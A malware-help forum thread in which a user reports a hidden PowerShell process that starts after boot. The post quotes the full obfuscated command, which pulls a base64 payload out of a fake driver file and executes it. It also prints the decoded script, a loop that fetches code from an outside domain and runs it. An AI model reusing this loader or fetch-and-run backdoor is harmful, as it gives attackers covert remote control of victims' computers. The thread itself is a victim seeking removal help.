Welcome to MalwareRemoval.com,
What if we told you that you could get malware removal help from experts, and that it was 100% free? MalwareRemoval.com provides free support for people with infected computers. Our help, and the tools we use are always 100% free. No hidden catch. We simply enjoy helping others. You enjoy a clean, safe computer.

Malware Removal Instructions

malware powershell script running after boot

MalwareRemoval.com provides free support for people with infected computers. Using plain language that anyone can understand, our community of volunteer experts will walk you through each step.

malware powershell script running after boot

Unread postby jeancremers » June 15th, 2022, 5:26 am

Since some update i have this powershell script running some time after a boot.

This is the command line, obviously some malware but what?
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\SkVSjq0D9\DA4A1F43-F9E8-4A62-988D-3DDAC0ECE249.sys'), 1560279, 410); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))}

I can't find the parent.
I've been told the command goes: read 410 bytes from position 156027, decode 64, then turn into a string and execute.

Thanks for help!
You do not have the required permissions to view the files attached to this post.
jeancremers
Active Member
 
Posts: 4
Joined: June 15th, 2022, 5:17 am
Advertisement
Register to Remove

Re: malware powershell script running after boot

Unread postby jeancremers » June 15th, 2022, 6:30 am

This is the script, i blocked the url in the hosts file.

while ($true) {
try {
$r = Invoke-RestMethod -Uri 'http://wmail-service.com/v1/CECCE2DA-EF51-4D10-B16A-726EEBC7E043?v=Downloads_Counter12'
if($r -ne '')
{
Start-Job ([ScriptBlock]::Create($r)) | Wait-Job
}
}
catch {}
Start-Sleep 2
}
jeancremers
Active Member
 
Posts: 4
Joined: June 15th, 2022, 5:17 am

Re: malware powershell script running after boot

Unread postby jeancremers » June 15th, 2022, 8:58 am

I also deleted the system32\drivers\SkVSjq0D9\ map and rebooted 4 hours ago, the process has not come back since.
jeancremers
Active Member
 
Posts: 4
Joined: June 15th, 2022, 5:17 am

Re: malware powershell script running after boot

Unread postby pgmigg » June 26th, 2022, 9:08 pm

Unfortunately, as you have replayed to your own topic, the topic must be closed as it would likely go unnoticed by helpers who are looking for topics that have only a single post.

May I draw your attention to the topic: ALL USERS OF THIS FORUM MUST READ THIS FIRST, which you should have read before posting for help.

The section here explains why you should not reply to your topic before a helper replies.

Please start a new topic with just a single post, and this time attach your logs, then wait for a helper to reply. Thank you for your understanding.

This topic is now closed.
User avatar
pgmigg
Admin/Teacher
Admin/Teacher
 
Posts: 5457
Joined: July 8th, 2008, 1:25 pm
Location: GMT-05:00
Advertisement
Register to Remove


  • Similar Topics
    Replies
    Views
    Last post

Return to Infected? Virus, malware, adware, ransomware, oh my!



Who is online

Users browsing this forum: No registered users and 292 guests

Contact us:

Advertisements do not imply our endorsement of that product or service. Register to remove all ads. The forum is run by volunteers who donate their time and expertise. We make every attempt to ensure that the help and advice posted is accurate and will not cause harm to your computer. However, we do not guarantee that they are accurate and they are to be used at your own risk. All trademarks are the property of their respective owners.

Member site: UNITE Against Malware